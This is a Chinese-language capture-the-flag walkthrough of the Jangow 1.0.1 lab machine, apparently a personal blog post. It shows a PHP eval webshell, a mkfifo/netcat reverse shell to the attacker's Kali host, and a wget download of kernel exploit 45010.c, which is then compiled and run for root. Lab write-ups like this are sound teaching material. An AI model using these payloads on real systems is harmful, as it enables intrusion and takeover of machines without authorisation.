简介
- Name: Jangow: 1.0.1
- Date release: 4 Nov 2021
- Author: Jangow
- Series: Jangow
描述
Difficulty: easy
The secret to this box is enumeration! Inquiries jangow2021@gmail.com
This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0
nmap
扫不到ip
参考:
1 2
| https://blog.csdn.net/qq_41918771/article/details/103636890 https://www.cnblogs.com/2022zzt/p/15966351.html
|
data:image/s3,"s3://crabby-images/cdf2b/cdf2bfe597c5f6bf3addbe4eac289a316885c07c" alt="image-20221006100325644"
data:image/s3,"s3://crabby-images/0b511/0b511dada7ae1ea49d926a372d7486b5214ffd71" alt="image-20221006100353773"
data:image/s3,"s3://crabby-images/a2234/a2234fb39cc855cbc7d0c7b87652e19d56356d00" alt="image-20221006100411044"
信息收集
data:image/s3,"s3://crabby-images/05569/0556991f15889fad3e501a2aa12ee76c5663563d" alt="image-20221006100644701"
1 2
| kali 192.168.169.220 靶机 192.168.169.230
|
扫描ip
data:image/s3,"s3://crabby-images/87945/87945201a04c5002a36a3c16bed970c195c491d0" alt="image-20221006101413832"
data:image/s3,"s3://crabby-images/c9a36/c9a364a7bd8ede8edeb746bcca6e47e692595e26" alt="image-20221006101534575"
data:image/s3,"s3://crabby-images/657cc/657cc1fea663f7a73f59475d29eb786e67cfefbc" alt="image-20221006101648343"
data:image/s3,"s3://crabby-images/a05a1/a05a1de0b3208f2c3d87ba64ca2344cf31fc1049" alt="image-20221006101750058"
data:image/s3,"s3://crabby-images/632cf/632cf07a8fc87b79b581879c3c72fabe2b14f196" alt="image-20221006101823212"
- 点击Busar之后我们看url发现可能是个传参点,尝试输入whoami,发现是命令执行传参点。
data:image/s3,"s3://crabby-images/da2e8/da2e88b952d7935064746428c7c4bbda83d6c056" alt="image-20221006101905310"
尝试上传webshell
1
| echo '<?php eval($_POST["aaa"]);' > aaa.php
|
data:image/s3,"s3://crabby-images/9c979/9c979de68f7ca3cc06c6d4ab3b52f71f6baca20c" alt="image-20221006102613683"
data:image/s3,"s3://crabby-images/64ed4/64ed4ca228feb37b2feaedf420e4a656765999bc" alt="image-20221006102722920"
data:image/s3,"s3://crabby-images/07901/0790142cab1ff12777493729fe5bf23318ad7842" alt="image-20221006102750522"
php 反弹 shell
1 2 3
| <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.169.220 443 >/tmp/f');?> #直接在本地写好,用蚁剑上传即可,我保存为shell.php #443 端口不要改
|
data:image/s3,"s3://crabby-images/95c36/95c36a543dda80c72bffa91270e314638fd3f6fd" alt="image-20221006105203183"
1
| http://192.168.169.230/site/shell.php
|
data:image/s3,"s3://crabby-images/ecc09/ecc096704e9007eca1f2b80a4fba447ccbe1480f" alt="image-20221006105243662"
1
| python3 -c "import pty;pty.spawn('/bin/bash')"
|
data:image/s3,"s3://crabby-images/f1fc3/f1fc3a101b8c2123b33144eb03cf358b1d79a1e7" alt="image-20221006105430902"
提权
系统信息
data:image/s3,"s3://crabby-images/5d7d9/5d7d98bb7dc70a50eb00fc3a69cc878fcfac149e" alt="image-20221006111834055"
搜索可利用漏洞
data:image/s3,"s3://crabby-images/45c32/45c32374e3c2269e1ed8b2c66a489e008e763b07" alt="image-20221006111945582"
data:image/s3,"s3://crabby-images/e1326/e132687f9c48cf32d1c61e1d54a0c1d3170694bd" alt="image-20221006112143847"
利用漏洞
- kali 开启下载端口
1
| python3 -m http.server 808
|
- 把文件放在
/var/www/html/
data:image/s3,"s3://crabby-images/c6411/c6411906ee12fa4ebfbba3f2a5ac950fceacc45a" alt="image-20221006112648142"
- 靶机下载,也可以通过蚁上传
1
| wget http://192.168.169.220:808/45010.c
|
- 查看文件
data:image/s3,"s3://crabby-images/13628/13628653c84d2b754a46805b5f4246d6bdcfea1d" alt="image-20221006113842920"
- 编译文件,多出一个
a.out
data:image/s3,"s3://crabby-images/56707/5670751187e89ffa4329e2eae919f23fc1bc81e5" alt="image-20221006113934902"
- 运行
a.out
data:image/s3,"s3://crabby-images/5cbc3/5cbc33d45109032c7388e1ee7f9236f8ce1c1975" alt="image-20221006114058553"
结束
data:image/s3,"s3://crabby-images/40015/40015e0b4da0f7ae6a535a112e0fc05feb4a4153" alt="image-20221006114154598"